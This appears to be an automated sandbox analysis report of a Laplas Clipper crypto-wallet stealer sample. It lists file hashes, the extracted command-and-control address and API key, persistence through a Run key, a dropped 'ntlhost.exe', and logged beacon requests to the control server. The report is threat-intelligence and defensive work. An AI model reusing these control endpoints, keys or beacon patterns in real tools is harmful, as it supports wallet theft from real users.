Analysis

  • max time kernel
    31s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/05/2023, 16:14 UTC

General

  • Target
    08439699.exe
  • Size
    4.0MB
  • MD5
    feccda803ece2e7a3b7e9798714ad47e
  • SHA1
    e97182adccf8a7692e6ad2614b0fb7fd3898a1a2
  • SHA256
    14529dca41abfea65abb51c84ec34ba0a951581586f98cef60213ae949a78320
  • SHA512
    dec5fd4d184772ca590333b2382706c6e5a7b5050f9ae98af813192e06500424870e8332a1406c763e5cc6d266ddd7e09280b6bf118392fa6edea6fab5843287
  • SSDEEP
    49152:jEjwvlIKv05z+UERnIcYmWjc3Cdh+5E9UFiqeb0/B1:RlhWzZ6hjEciqe

Malware Config

Extracted

Family

laplas

C2

http://185.223.93.251

Attributes
  • api_key
    f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Executes dropped EXE (1 IoC)
  • Loads dropped DLL (2 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • GoLang User-Agent (1 IoC)

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory (3 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\08439699.exe (PID 1592, depth 1)
    Command line: "C:\Users\Admin\AppData\Local\Temp\08439699.exe"
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe (PID 1532, depth 2)
      Command line: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      • Executes dropped EXE

Network

  • GET http://185.223.93.251/bot/regex
    Process: ntlhost.exe
    Remote address: 185.223.93.251:80 (NL)
    Request:
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:15:00 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    Process: ntlhost.exe
    Remote address: 185.223.93.251:80 (NL)
    Request:
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:15:00 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • GET http://185.223.93.251/bot/regex
    Process: ntlhost.exe
    Remote address: 185.223.93.251:80 (NL)
    Request:
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:16:06 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    Process: ntlhost.exe
    Remote address: 185.223.93.251:80 (NL)
    Request:
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:16:06 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • GET http://185.223.93.251/bot/regex
    Process: ntlhost.exe
    Remote address: 185.223.93.251:80 (NL)
    Request:
    GET /bot/regex HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:17:11 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 633
    Connection: keep-alive
  • GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    Process: ntlhost.exe
    Remote address: 185.223.93.251:80 (NL)
    Request:
    GET /bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin HTTP/1.1
    Host: 185.223.93.251
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 25 May 2023 16:17:12 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: keep-alive
  • 185.223.93.251:80 (http, ntlhost.exe)
    Last URL: http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    Bytes: 1.6kB / 4.3kB; packets: 15 / 20
    HTTP requests on this connection, in order (each answered with 200):
    GET http://185.223.93.251/bot/regex
    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    GET http://185.223.93.251/bot/regex
    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin
    GET http://185.223.93.251/bot/regex
    GET http://185.223.93.251/bot/online?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7&guid=HVMHZIYD\Admin

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    Filesize
    782.0MB
    MD5
    d47b1121c27ff835a9f315720c32a1b2
    SHA1
    63b61c2fbd431b083953075f0e44493b43856324
    SHA256
    5904b02260cde3849b8892ff154ed0b58b1c7800c700b63bc79e3d16a849597d
    SHA512
    f216c008c3870fdc7ae66f38fbfc70a50d546e20803516454ae875154c65a508fa573f58e1a25bf03467226a405e51fb5b42055a31b8cc185df6fedad6670f18

  • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    Filesize
    643.2MB
    MD5
    ab79fefff89222e8dd3598277adc0766
    SHA1
    0b1b4b49848e8ea7dd92fea80303a955f67ce07f
    SHA256
    4e6e19c8cd2bf70335555c82ec96416656e27edf021e220fb1bb6aab586c943d
    SHA512
    2984cc2641fa4f5e26e2767c30ee06fbeb8f222fdc3bade5be3df4cf37c10cd6f947a33cde7b9d05be8af9bad95d464c007509de9044d71d09f24c7e07a05835

  • \Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    Filesize
    620.6MB
    MD5
    a1ed8bdca9f51338ea1ffd61e8a10884
    SHA1
    7366825e741502a16ea8963c5497f9fefecce77c
    SHA256
    4f9a0d135eef57cf21fd84bd56321417952fe7905159d92e41c91f3b34307df5
    SHA512
    dc878c7d347d114c6bf4cb07b5dbb7f0650a6752fddc93eb6ff5e3226e6936324f5620a4868df3d9af56673a7c8463f65af67da5eb100d8e016fbd7da799952e
